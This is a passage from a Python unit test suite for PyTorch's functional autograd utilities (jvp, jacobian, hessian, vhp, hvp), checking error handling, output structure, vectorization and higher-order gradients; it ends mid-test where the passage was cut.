        return x.sum(dim=1)

    inputs = torch.rand(2, 2, dtype=torch.double)
    v = torch.ones(2, 2, dtype=torch.double)
    inputs.requires_grad_()
    v.requires_grad_()
    res = autogradF.jvp(reducer, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], res[0])
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))

    def adder(x, y):
        return 2 * x + 3 * y, x * y

    inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
              torch.rand(2, dtype=torch.double, requires_grad=True))
    v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
         torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))

    # Differentiate through the [1] slot (the jvp itself) w.r.t. inputs and v.
    gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)

    def foo(*args):
        x, y = args[:2]
        v = args[2:]

        x = x.cos()
        val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)

        return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()

    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
    """Check _construct_standard_basis_for: per-input blocks keep each input's
    dtype/device, and concatenated (flattened one-hot rows) they form the
    (total_numel x total_numel) identity."""
    numels = tuple(tensor.numel() for tensor in inputs)
    results = autogradF._construct_standard_basis_for(inputs, numels)
    for result, inp in zip(results, inputs):
        self.assertEqual(result.dtype, inp.dtype)
        self.assertEqual(result.device, inp.device)
    # Normalize dtype/device, then concatenate along dim=1: the result must
    # be square and equal to the identity matrix.
    results = torch.cat([result.to(device='cpu', dtype=torch.float)
                         for result in results], dim=1)
    expected = torch.eye(results[0].shape[0], dtype=torch.float)
    self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
    """Exercise basis construction over assorted shapes, arities and dtypes."""
    cases = [
        (torch.randn(2, 3),),
        (torch.randn(1),),
        (torch.randn([]),),
        (torch.randn(1), torch.randn([]), torch.randn([])),
        (torch.randn(2), torch.randn(3), torch.randn([])),
        (torch.randn(2), torch.randn([]), torch.randn(3)),
        (torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
        (torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
    ]
    for case in cases:
        self._test_construct_standard_basis_for(case)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
    """Basis construction must respect per-input devices (CPU and CUDA mixes)."""
    cases = [
        (torch.randn(2), torch.randn(3, device='cuda')),
        (torch.randn(3, device='cuda'), torch.randn(2)),
    ]
    for case in cases:
        self._test_construct_standard_basis_for(case)
def _test_vectorize_raises_no_warnings(self, api):
    """vmap is an experimental prototype that warns when invoked directly; the
    public vectorized jacobian/hessian APIs must not leak that warning to
    their callers, no matter how they are used."""
    def foo(t):
        return (t ** 2).sum()

    x = torch.randn(3)
    with warnings.catch_warnings(record=True) as caught:
        api(foo, x, vectorize=True)
    self.assertEqual(len(caught), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
    """jacobian(..., vectorize=True) must not emit the vmap prototype warning."""
    self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
    """hessian(..., vectorize=True) must not emit the vmap prototype warning."""
    self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
    """jacobian must type-check inputs/outputs; valid single- and multi-input
    functions produce interleaved-structure results."""
    def foo(t):
        return 3 * t.narrow(0, 0, 3)

    def bar(t):
        return 3 * t.narrow(0, 0, 3), "bar"

    x = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
        autogradF.jacobian(foo, (x, 2), vectorize=vectorize)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
        autogradF.jacobian(bar, x, vectorize=vectorize)
    result = autogradF.jacobian(foo, x, vectorize=vectorize)
    self._assert_interleaved_struct(result, foo(x), x)

    def two_arg(a, b):
        return b, 3 * a.narrow(0, 0, 3)

    pair = (torch.rand(4), torch.rand(5))
    result = autogradF.jacobian(two_arg, pair, vectorize=vectorize)
    self._assert_interleaved_struct(result, two_arg(*pair), pair)
def test_jacobian_err_check(self):
    """Error checks with the default (non-vectorized) implementation."""
    self._test_jacobian_err_check(vectorize=False)
def test_jacobian_err_check_vectorize(self):
    """Error checks with the vectorized (vmap-based) implementation."""
    self._test_jacobian_err_check(vectorize=True)
def test_jacobian_err_check_strict(self):
    """strict=True must reject detached outputs, outputs disconnected from the
    input, and input-independent jacobians; strict=False returns zeros (or the
    identity for a clone) instead."""
    def foo(a):
        return a.detach()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone()

    inp = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.jacobian(foo, inp, strict=True)
    res = autogradF.jacobian(foo, inp, strict=False)
    self._assert_interleaved_struct(res, foo(inp), inp)
    self.assertEqual(res.abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
        res = autogradF.jacobian(bar, inp, strict=True)
    res = autogradF.jacobian(bar, inp, strict=False)
    # FIX: compare against bar's output — the function actually used here;
    # the previous foo(inp) only passed because the two shapes coincide.
    self._assert_interleaved_struct(res, bar(inp), inp)
    self.assertEqual(res.abs().sum(), 0.)

    # The Jacobian does not depend on the input
    def foo(a):
        return a.clone()

    inp.requires_grad_()
    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
        res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
    res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    # clone is the identity map, so its jacobian is the identity matrix.
    self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
    """strict and vectorize are mutually exclusive options."""
    def identity(t):
        return t

    with self.assertRaisesRegex(RuntimeError, "not supported together"):
        autogradF.jacobian(identity, torch.rand(4), strict=True, vectorize=True)
def test_jacobian_no_grad(self):
    """no_grad does not stop jacobian from computing; create_graph still records."""
    def exp_reducer(t):
        return t.exp().sum(dim=1)

    xs = torch.rand(4, 4)
    with torch.no_grad():
        result = autogradF.jacobian(exp_reducer, xs)
    self.assertIsNone(result.grad_fn)
    self.assertNotEqual(result, torch.zeros(4, 4))

    with torch.no_grad():
        result = autogradF.jacobian(exp_reducer, xs, create_graph=True)
    self.assertIsNotNone(result.grad_fn)
    self.assertNotEqual(result, torch.zeros(4, 4))
def _test_jacobian_output(self, vectorize):
    """Output-structure checks: single input, identity map, and multi-input."""
    def exp_reducer(t):
        return t.exp().sum(dim=1)

    xs = torch.rand(4, 4)
    result = autogradF.jacobian(exp_reducer, xs, vectorize=vectorize)
    self._assert_interleaved_struct(result, exp_reducer(xs), xs)
    self.assertIsNone(result.grad_fn)

    def identity(t):
        return t.clone()

    xs = torch.rand(4)
    result = autogradF.jacobian(identity, xs, vectorize=vectorize)
    self._assert_interleaved_struct(result, identity(xs), xs)
    self.assertIsNone(result.grad_fn)
    # clone is the identity map, so its jacobian is the identity matrix.
    self.assertEqual(result, torch.eye(4))

    def add_exp_reducer(a, b):
        return (a + b.exp()).sum(dim=1)

    pair = (torch.rand(4, 4), torch.rand(4, 4))
    result = autogradF.jacobian(add_exp_reducer, pair, vectorize=vectorize)
    self._assert_interleaved_struct(result, add_exp_reducer(*pair), pair)
    self.assertIsNone(result[0].grad_fn)
    self.assertIsNone(result[1].grad_fn)
def test_jacobian_output(self):
    """Output-structure checks, non-vectorized path."""
    self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
    """Output-structure checks, vectorized path."""
    self._test_jacobian_output(vectorize=True)
def _test_jacobian_scalar(self, vectorize):
    """Scalar outputs and scalar inputs collapse the jacobian's shape."""
    def reducer(t):
        return t.sum()

    xs = torch.rand(4, 4)
    self._assert_same_struct(autogradF.jacobian(reducer, xs, vectorize=vectorize), xs)

    def expander(t):
        return t.unsqueeze(0).repeat(4)

    scalar = torch.rand([])
    self._assert_same_struct(autogradF.jacobian(expander, scalar, vectorize=vectorize),
                             torch.zeros(4))
def test_jacobian_scalar(self):
    """Scalar-shape checks, non-vectorized path."""
    self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
    """Scalar-shape checks, vectorized path."""
    self._test_jacobian_scalar(vectorize=True)
def _test_jacobian_create_graph(self, vectorize):
    """jacobian with create_graph=True must itself be differentiable: results
    carry a grad_fn and pass gradcheck/gradgradcheck, including when composed
    inside a larger differentiable expression."""
    def exp_reducer(x):
        return x.exp().sum(dim=1)

    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
    self.assertIsNotNone(res.grad_fn)

    gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)

    def add_exp_reducer(x, y):
        return (x + y).exp().sum(dim=1)

    inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
              torch.rand(4, 4, dtype=torch.double, requires_grad=True))
    res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)

    gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)

    def foo(x, y):
        x = x.cos()
        val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)

        res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
        res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
        return res

    gradcheck(foo, inputs)
    gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
    """create_graph checks, non-vectorized path."""
    self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
    """create_graph checks, vectorized path."""
    self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
    """The vectorized (vmap-based) jacobian must agree with the loop-based one."""
    slow = autogradF.jacobian(f, inputs, vectorize=False)
    fast = autogradF.jacobian(f, inputs, vectorize=True)
    self.assertEqual(fast, slow)
def test_jacobian_vectorize_correctness_simple(self):
    """Elementwise polynomial, single multi-dim input."""
    def f(t):
        return 3 * t ** 2

    self._check_jacobian_vectorize_correctness(f, torch.randn(2, 3, 5))
def test_jacobian_vectorize_correctness_multi_input(self):
    """Two inputs combined through a matmul."""
    def f(a, b):
        return (a.cos() * a) @ b.sin()

    self._check_jacobian_vectorize_correctness(f, (torch.randn(2, 3), torch.randn(3, 5)))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
    """Multiple inputs and multiple mixed-shape outputs."""
    def f(a, b):
        return (a * a) @ b, a @ (a.sum(1) * b), b.sum()

    self._check_jacobian_vectorize_correctness(f, (torch.randn(5, 3), torch.randn(3, 5)))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
    """Each output depends on only one of the inputs."""
    def f(a, b):
        return a, b, a, b

    self._check_jacobian_vectorize_correctness(f, (torch.randn(2), torch.randn(3)))
def test_jacobian_vectorize_correctness_zero_dim(self):
    """Zero-dim outputs, zero-dim inputs, and a mix of both."""
    # zero-dim output
    def f(a, b):
        return a.sum(), b.sum(), a * b

    self._check_jacobian_vectorize_correctness(f, (torch.randn(3), torch.randn(3)))

    # zero-dim input
    def g(a):
        return torch.stack([a, a, a])

    self._check_jacobian_vectorize_correctness(g, torch.randn([]))

    # Mixed zero-dim input / zero-dim output
    def h(a, b):
        return b.sum(), a * b

    self._check_jacobian_vectorize_correctness(h, (torch.randn([]), torch.randn(1)))
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_jacobian_vectorize_correctness_different_devices(self):
    """Outputs living on different devices (CPU and CUDA)."""
    def f(a, b):
        return a * b, (a * b).cuda()

    self._check_jacobian_vectorize_correctness(f, (torch.randn(3), torch.randn(3)))
def test_jacobian_vectorize_correctness_different_dtype(self):
    """Outputs with different floating dtypes."""
    def f(a, b):
        return (a * b).float(), (a * b).double()

    self._check_jacobian_vectorize_correctness(f, (torch.randn(3), torch.randn(3)))
def _check_hessian_vectorize_correctness(self, f, inputs):
    """The vectorized (vmap-based) hessian must agree with the loop-based one."""
    slow = autogradF.hessian(f, inputs, vectorize=False)
    fast = autogradF.hessian(f, inputs, vectorize=True)
    self.assertEqual(fast, slow)
def test_hessian_vectorize_correctness_simple(self):
    """Elementwise polynomial reduced to a scalar, single input."""
    def f(t):
        return (3 * t ** 2).sum()

    self._check_hessian_vectorize_correctness(f, torch.randn(2, 3, 5))
def test_hessian_vectorize_correctness_multi_input(self):
    """Three inputs combined through matmuls into a scalar."""
    def f(a, b, c):
        return ((a.relu() * a) @ b.sin() @ c).sum()

    self._check_hessian_vectorize_correctness(
        f, (torch.randn(2, 3), torch.randn(3, 5), torch.randn(5, 5)))
def test_hessian_vectorize_correctness_unrelated_outputs(self):
    """Hessian when the scalar output ignores some or all of the inputs."""
    # output unrelated to one input
    def f(a, b):
        return (a ** 2).sum()

    self._check_hessian_vectorize_correctness(f, (torch.randn(2), torch.randn(3)))

    # output unrelated to all inputs
    def g(a, b):
        return torch.randn([])

    self._check_hessian_vectorize_correctness(g, (torch.randn(2), torch.randn(3)))
def _test_hessian_err_check(self, vectorize):
    """hessian must reject non-Tensor inputs, non-Tensor outputs,
    multi-element outputs and multi-Tensor outputs; valid scalar-valued
    functions (single or multiple inputs) pass."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    def bar(a):
        # second output is not a Tensor
        return 3 * a.narrow(0, 0, 3), "bar"

    def bar2(a):
        # output Tensor is not a scalar
        return 3 * a.narrow(0, 0, 3)

    def bar3(a):
        # returns more than one Tensor
        return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)

    inp = torch.rand(4)
    with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
        res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
        res = autogradF.hessian(bar, inp, vectorize=vectorize)
    err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
    with self.assertRaisesRegex(RuntimeError, err_msg_out):
        res = autogradF.hessian(bar2, inp, vectorize=vectorize)
    with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
        res = autogradF.hessian(bar3, inp, vectorize=vectorize)
    res = autogradF.hessian(foo, inp, vectorize=vectorize)
    self._assert_interleaved_struct(res, inp, inp)

    def foo(a, b):
        return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()

    inp = (torch.rand(4), torch.rand(5))
    res = autogradF.hessian(foo, inp, vectorize=vectorize)
    self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
    """Error checks with the default (non-vectorized) implementation."""
    self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
    """Error checks with the vectorized (vmap-based) implementation."""
    self._test_hessian_err_check(vectorize=True)
def test_hessian_err_check_strict(self):
    """strict=True must reject detached outputs, outputs disconnected from the
    input, and linear functions (input-independent jacobian); strict=False
    returns all-zero hessians instead."""
    def foo(a):
        return a.detach().sum()

    def bar(a):
        # Make a non-leaf Tensor that requires_grad but that is not connected to the input
        return a.long().float().requires_grad_().clone().sum()

    def bar2(a):
        # A Linear function for which the jacobian is independent of the input
        return (3 * a).sum()

    inp = torch.rand(4)
    with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
        res = autogradF.hessian(foo, inp, strict=True)
    res = autogradF.hessian(foo, inp, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    self.assertEqual(res.abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
        res = autogradF.hessian(bar, inp, strict=True)
    res = autogradF.hessian(bar, inp, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    self.assertEqual(res.abs().sum(), 0.)

    with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
        res = autogradF.hessian(bar2, inp, strict=True)
    res = autogradF.hessian(bar2, inp, strict=False)
    self._assert_interleaved_struct(res, inp, inp)
    # Linear function: the hessian is identically zero.
    self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
    """strict and vectorize are mutually exclusive options."""
    def cube_sum(t):
        return (t ** 3).sum()

    with self.assertRaisesRegex(RuntimeError, "not supported together"):
        autogradF.hessian(cube_sum, torch.rand(4), strict=True, vectorize=True)
def test_hessian_no_grad(self):
    """no_grad does not stop hessian from computing; create_graph still records."""
    def pow_reducer(t):
        return t.pow(3).sum()

    xs = torch.rand(2, 2)
    with torch.no_grad():
        result = autogradF.hessian(pow_reducer, xs)
    for i in range(2):
        for j in range(2):
            self.assertIsNone(result[i][j].grad_fn)
    self.assertNotEqual(result, torch.zeros(2, 2, 2))

    with torch.no_grad():
        result = autogradF.hessian(pow_reducer, xs, create_graph=True)
    for i in range(2):
        for j in range(2):
            self.assertIsNotNone(result[i][j].grad_fn)
    self.assertNotEqual(result, torch.zeros(2, 2, 2))
def _test_hessian_output(self, vectorize):
    """The hessian mirrors the (inputs x inputs) structure and carries no graph by default."""
    def pow_reducer(x):
        return x.pow(3).sum()

    single = torch.rand(2, 2)
    hess = autogradF.hessian(pow_reducer, single, vectorize=vectorize)
    self._assert_interleaved_struct(hess, single, single)
    self.assertIsNone(hess.grad_fn)

    def add_pow_reducer(x, y):
        return (x + y).pow(3).sum()

    pair = (torch.rand(2, 2), torch.rand(2, 2))
    hess = autogradF.hessian(add_pow_reducer, pair, vectorize=vectorize)
    self._assert_interleaved_struct(hess, pair, pair)
    # Multi-input case: every sub-block of the tuple-of-tuples is detached.
    for row in hess:
        for block in row:
            self.assertIsNone(block.grad_fn)
def test_hessian_output(self):
    """Non-vectorized variant of the hessian output-structure checks."""
    self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
    """Vectorized variant of the hessian output-structure checks."""
    self._test_hessian_output(vectorize=True)
def _test_hessian_scalar(self, vectorize):
    """hessian() accepts 0-dim inputs and single-element outputs of any shape."""
    def reducer(x):
        return x.sum()

    mat = torch.rand(4, 4)
    res = autogradF.hessian(reducer, mat, vectorize=vectorize)
    self._assert_interleaved_struct(res, mat, mat)

    # 0-dim (scalar) input is also supported.
    scalar = torch.rand([])
    res = autogradF.hessian(reducer, scalar, vectorize=vectorize)
    self._assert_same_struct(res, scalar)

    def bad_reducer(x):
        # Single element, but reshaped to rank 3 — still accepted.
        return x.sum().view(1, 1, 1)

    mat = torch.rand(4, 4)
    res = autogradF.hessian(bad_reducer, mat, vectorize=vectorize)
    self._assert_interleaved_struct(res, mat, mat)
def test_hessian_scalar(self):
    """Non-vectorized variant of the scalar-input hessian checks."""
    return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
    """Vectorized variant of the scalar-input hessian checks."""
    return self._test_hessian_scalar(vectorize=True)
def _test_hessian_create_graph(self, vectorize):
    """With create_graph=True the hessian is itself differentiable (grad_fn set)
    and higher-order gradients through it pass gradcheck/gradgradcheck,
    for both single-Tensor and tuple inputs."""
    def pow_reducer(x):
        return x.pow(3).sum()
    inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
    res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, inputs, inputs)
    # create_graph=True must attach a grad_fn to the returned hessian.
    self.assertIsNotNone(res.grad_fn)
    gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
    def add_pow_reducer(x, y):
        return (x + y).pow(3).sum()
    inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
              torch.rand(2, 2, dtype=torch.double, requires_grad=True))
    res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
    self._assert_interleaved_struct(res, inputs, inputs)
    # Every sub-block of the tuple-of-tuples result carries a graph.
    self.assertIsNotNone(res[0][0].grad_fn)
    self.assertIsNotNone(res[0][1].grad_fn)
    self.assertIsNotNone(res[1][0].grad_fn)
    self.assertIsNotNone(res[1][1].grad_fn)
    def flatten(inp):
        # gradcheck expects a flat tuple of Tensors, not a tuple of tuples.
        return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
    gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
    gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
    def foo(x, y):
        # Feed the hessian into further ops to exercise double backward.
        x = x.cos()
        val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
        res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
        res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
        return res
    gradcheck(foo, inputs)
    gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
    """Non-vectorized variant of the create_graph hessian checks."""
    self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
    """Vectorized variant of the create_graph hessian checks."""
    self._test_hessian_create_graph(vectorize=True)
def test_vhp_err_check(self):
    """vhp() rejects malformed inputs, outputs and v with descriptive errors."""
    def scalar_fn(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    def tuple_out_fn(a):
        return 3 * a.narrow(0, 0, 3), "bar"

    def vector_out_fn(a):
        return 3 * a.narrow(0, 0, 3)

    inp = torch.rand(4)
    v = torch.rand(4)

    with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
        autogradF.vhp(scalar_fn, (inp, 2), v)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
        autogradF.vhp(tuple_out_fn, inp, v)
    with self.assertRaisesRegex(RuntimeError,
                                "The Tensor returned by the function given to vhp should contain a single element"):
        autogradF.vhp(vector_out_fn, inp, v)
    with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
        autogradF.vhp(scalar_fn, inp, torch.rand(5))
    with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
        autogradF.vhp(scalar_fn, inp, (v, 2))

    # Well-formed single-input call succeeds.
    res = autogradF.vhp(scalar_fn, inp, v)
    self._assert_same_struct(res[1], inp)

    # Well-formed multi-input call succeeds too.
    def two_input_fn(a, b):
        return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()

    inp = (torch.rand(4), torch.rand(5))
    v = (torch.rand(4), torch.rand(5))
    res = autogradF.vhp(two_input_fn, inp, v)
    self._assert_same_struct(res[1], inp)
def test_vhp_err_check_strict(self):
    """strict=True surfaces disconnected/constant graphs; strict=False yields zeros."""
    def detached(a):
        return a.detach().sum()

    def disconnected(a):
        # Non-leaf Tensor that requires grad but is unrelated to the input.
        return a.long().float().requires_grad_().clone().sum()

    def linear(a):
        # Linear function: its jacobian does not depend on the input.
        return (3 * a).sum()

    inp = torch.rand(4)
    v = torch.rand(4)

    cases = [
        (detached, "Output 0 of the user-provided function does not require gradients."),
        (disconnected, "The output of the user-provided function is independent of input 0"),
        (linear, "jacobian of the user-provided function with respect to input 0 is"),
    ]
    for fn, pattern in cases:
        with self.assertRaisesRegex(RuntimeError, pattern):
            autogradF.vhp(fn, inp, v, strict=True)
        # Non-strict mode silently returns an all-zero vhp instead.
        res = autogradF.vhp(fn, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
def test_vhp_no_grad(self):
    """vhp() runs under torch.no_grad(); create_graph=True still builds a graph."""
    def reducer(x):
        return x.exp().sum()

    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)

    with torch.no_grad():
        out, vhp_val = autogradF.vhp(reducer, inputs, v)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(vhp_val.grad_fn)
    self.assertNotEqual(vhp_val, torch.zeros(4, 4))

    with torch.no_grad():
        out, vhp_val = autogradF.vhp(reducer, inputs, v, create_graph=True)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(vhp_val.grad_fn)
    self.assertNotEqual(vhp_val, torch.zeros(4, 4))
def test_vhp_output(self):
    """By default vhp() returns detached results whose structure matches the inputs."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    inputs = torch.rand(4, 4)
    v = torch.ones(4, 4)
    out, vhp_val = autogradF.vhp(foo, inputs, v)
    self._assert_same_struct(vhp_val, inputs)
    self.assertIsNone(out.grad_fn)
    self.assertIsNone(vhp_val.grad_fn)

    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()

    inputs = (torch.rand(3), torch.rand(4))
    v = (torch.ones(3), torch.ones(4))
    res = autogradF.vhp(bar, inputs, v)
    self._assert_same_struct(res[1], inputs)
    self.assertIsNone(res[0].grad_fn)
    for part in res[1]:
        self.assertIsNone(part.grad_fn)
def test_vhp_scalar(self):
    """vhp() handles 0-dim inputs, an omitted v for scalars, and reshaped scalar outputs."""
    def reducer(x):
        return x.sum()

    mat = torch.rand(4, 4)
    res = autogradF.vhp(reducer, mat, torch.ones(4, 4))
    self._assert_same_struct(res[1], mat)

    # 0-dim input: v may be 0-dim, or omitted entirely.
    scalar = torch.rand([])
    res = autogradF.vhp(reducer, scalar, torch.rand([]))
    self._assert_same_struct(res[1], scalar)
    res = autogradF.vhp(reducer, scalar)
    self._assert_same_struct(res[1], scalar)

    def bad_reducer(x):
        # Single element, but reshaped to rank 3 — still accepted.
        return x.sum().view(1, 1, 1)

    mat = torch.rand(4, 4)
    res = autogradF.vhp(bad_reducer, mat, torch.rand(4, 4))
    self._assert_same_struct(res[1], mat)
def test_vhp_create_graph(self):
    """With create_graph=True both vhp() outputs are differentiable and pass
    gradcheck/gradgradcheck, for single and tuple inputs."""
    def foo(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()
    inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
    v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
    res = autogradF.vhp(foo, inputs, v, create_graph=True)
    self._assert_same_struct(res[1], inputs)
    # Both the function value and the vhp must carry a grad_fn.
    self.assertIsNotNone(res[0].grad_fn)
    self.assertIsNotNone(res[1].grad_fn)
    gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
    gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
    def bar(a, b):
        return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
    inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
              torch.rand(4, dtype=torch.double, requires_grad=True))
    v = (torch.ones(3, dtype=torch.double, requires_grad=True),
         torch.ones(4, dtype=torch.double, requires_grad=True))
    out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
    self._assert_same_struct(vhp_val, inputs)
    self.assertIsNotNone(out.grad_fn)
    self.assertIsNotNone(vhp_val[0].grad_fn)
    self.assertIsNotNone(vhp_val[1].grad_fn)
    gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
    def foo(*args):
        x, y = args[:2]
        v = args[2:]
        # Feed the vhp outputs into further ops to exercise double backward.
        x = x.cos()
        val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
        return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
    gradcheck(foo, inputs + v)
    gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
    """hvp() rejects malformed inputs, outputs and v with descriptive errors."""
    def scalar_fn(a):
        return 3 * a.narrow(0, 0, 3).exp().sum()

    def tuple_out_fn(a):
        return 3 * a.narrow(0, 0, 3), "bar"

    def vector_out_fn(a):
        return 3 * a.narrow(0, 0, 3)

    inp = torch.rand(4)
    v = torch.rand(4)
    # A well-formed call works before exercising the failure cases.
    res = autogradF.hvp(scalar_fn, inp, v)
    with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
        autogradF.hvp(scalar_fn, (inp, 2), v)
    with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
        autogradF.hvp(tuple_out_fn, inp, v)
    with self.assertRaisesRegex(RuntimeError,
                                "The Tensor returned by the function given to hvp should contain a single element"):
        autogradF.hvp(vector_out_fn, inp, v)
    with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
